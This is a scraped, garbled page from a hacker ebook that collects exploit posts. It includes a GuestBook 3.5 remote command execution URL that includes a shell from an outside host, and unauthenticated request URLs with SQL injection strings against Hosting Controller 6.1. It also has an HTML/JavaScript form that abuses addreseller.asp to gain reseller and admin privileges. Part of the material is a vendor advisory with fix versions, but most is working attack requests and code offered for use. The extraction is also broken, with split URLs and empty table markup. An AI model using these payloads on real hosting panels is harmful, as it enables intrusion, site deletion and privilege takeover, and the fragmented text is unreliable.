Hacker Professional Ebook part 377 pptx

echo "Exploit failed...\r\n"; ?> micimackoHCE GuestBook 3.5 Remote Command Execution Xploit: Code: http://www.site.com/[scriptpath]/index.php?GB_PATH=http://con shell black_hat_crHCE

Trang 1

echo "Exploit failed \r\n";

?>

micimacko(HCE)

GuestBook 3.5 Remote Command Execution

Xploit:

Code:

http://www.site.com/[scriptpath]/index.php?GB_PATH=http://con shell

black_hat_cr(HCE)

Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln

Trích:

Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln

SQL_Injection, Command Injection

-

[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2

Vendor: Hosting Controller

Vendor URL: www.hostingcontroller.com

Solution: Hotfix 3.3

Found Date: 7/1/2006

Release Date: 10/10/2006

Discussion:

Trang 2

-

UnAuthenticated user can

1- delete every sites virtual directory on hc sites

2- make forum virtual directory (with the desire name) for everysites on hc! 3- disable all hc forums by SQL Injection

4- enable all hc forums by SQL Injection

Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory

Exploit: (or POC)

-

1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!

/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=tes tsite.com&VDirName=test&ForumID=1

-

2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!

/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=tests ite.com&VDirName=test&ForumID=

-

3- unAuthenticated user can disable all hc forums by SQL_Injection

/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1 -

4- unAuthenticated user can enable all hc forums by SQL_Injection

/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1 -

Credit :

-

Soroush Dalili of Kapda and GSG

IRSDL [4t} kapda <d0t] ir

Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]

Trang 3

GSG - Grayhatz security group [http://www.Grayhatz.net]

-

By Pi3cH On 16 Oct 2006

Navaro(HCE)

Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability

Title: An attacker can gain reseller privileges and after that can gain admin

privileges

Version: 6.1 Hotfix <= 3.1

Developer url: www.Hostingcontroller.com

Solution: Update to Hotfix 3.2

Discover date: 2005,Summer

Report date (to hc company): Sat Jun 10, 2006

Publish date (in security forums): Thu July 06, 2006

-

===============================================

1- This code give resadmin session to a user:

Bug in "hosting/addreseller.asp", No checker is available

-

function siteaction(){

n_act= "/hosting/addreseller.asp?htype=3"

window.document.all.frm1.action = window.document.all.siteact.value + n_act window.document.all.frm1.submit()

}

</script>

Trang 4

Form1<br>

URL: <input type="text" name=siteact size=70>

<br>

<table>

<tr>

<td>reseller</td>

</tr>

<tr>

<td>loginname</td>

</tr>

<tr>

<td>Password</td>

</tr>

<tr>

<td>first_name</td>

</tr>

<tr>

<td>first_name</td>

</tr>

<tr>

</tr>

<tr>

<td>address</td>

</tr>

<tr>

Trang 5

</tr>

<tr>

<td>state</td>

</tr>

<tr>

<td>country</td>

</tr>

<tr>

<td>email</td>

</tr>

<tr>

<td>phone</td>

</tr>

<tr>

</tr>

<tr>

</tr>

<tr>

<td>selMonth</td>

</tr>

<tr>

<td>selYear</td>

</tr>

Trang 6

<tr>

Định dạng
Số trang	6
Dung lượng	14,62 KB